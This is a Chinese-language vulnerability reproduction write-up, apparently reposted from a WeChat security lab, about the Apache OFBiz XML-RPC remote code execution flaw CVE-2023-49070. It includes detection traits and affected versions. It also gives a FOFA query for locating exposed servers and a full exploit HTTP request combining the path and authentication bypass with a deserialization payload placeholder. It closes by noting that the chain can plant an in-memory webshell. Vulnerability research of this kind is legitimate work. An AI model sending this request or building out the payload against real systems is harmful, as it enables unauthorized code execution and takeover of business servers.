0x01 产品简介
Apache OFBiz是一个开源的企业资源规划 (ERP)系统,提供了多种商业功能和模块
0x02 漏洞概述
漏洞成因
2020年,为修复 CVE-2020-9496 增加权限校验,存在绕过。2021年,增加 Filter 用于拦截 XMLRPC 中的恶意请求,存在绕过。2023年四月,彻底删除xmlrpc handler 以避免同类型的漏洞产生尽管主分支在四月份已经移除了XML-RPC组件,但在Apache OFBiz的正式发布版本中,仅最新版本18.12.10彻底废除了XML-RPC功能。
利用特征
流量分析: 攻击者利用这个漏洞时,会发送包含用户名和密码的 HTTP 请求到 XML-RPC 接口。在网络流量中,这可能表现为对 /webtools/control/xmlrpc 的异常访问请求。
异常请求内容: 利用 Filter 绕过机制的请求可能包含不寻常的 URI 结构,如使用分号或路径穿越技术(./)。
特定的错误日志: 在尝试进行反序列化攻击时,可能会在日志中观察到相关错误或异常信息,尤其是与XML-RPC 组件相关的。
漏洞影响
远程代码执行风险: 这个漏洞允许未授权的攻击者在服务器上执行任意代码,这可能导致数据泄露系统被勒索或控制权被夺取等严重的安全威胁。
数据安全和业务连续性: 由于 Apache OFBiz 通常用于管理关键业务流程,此类攻击可能对业务操作产生重大影响,包括数据损坏和服务中断。
0x03 影响范围
Apache OFBiz < 18.12.10
0x04 复现环境
FOFA: app="Apache_OFBiz"
0x05漏洞复现
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8Accept-Encoding: gzip, deflateAccept: */*Connection: close<methodCall><methodName>RCE</methodName><params><param><value><struct><member><name>RCE</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[CB1 base64编码的序列化数据]</serializable></value></member></struct></value></param></params></methodCall>
网上有人发扫描验证脚本,但是目标机器如果不出网,阁下又该如何应对,CB1链可以执行命令并回显和打入内存马,fofa上随机挑选的目标发现已经被人光顾过。
原文始发于微信公众号(星网实验室):Apache Ofbiz XML-RPC RCE漏洞复现(CVE-2023-49070
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论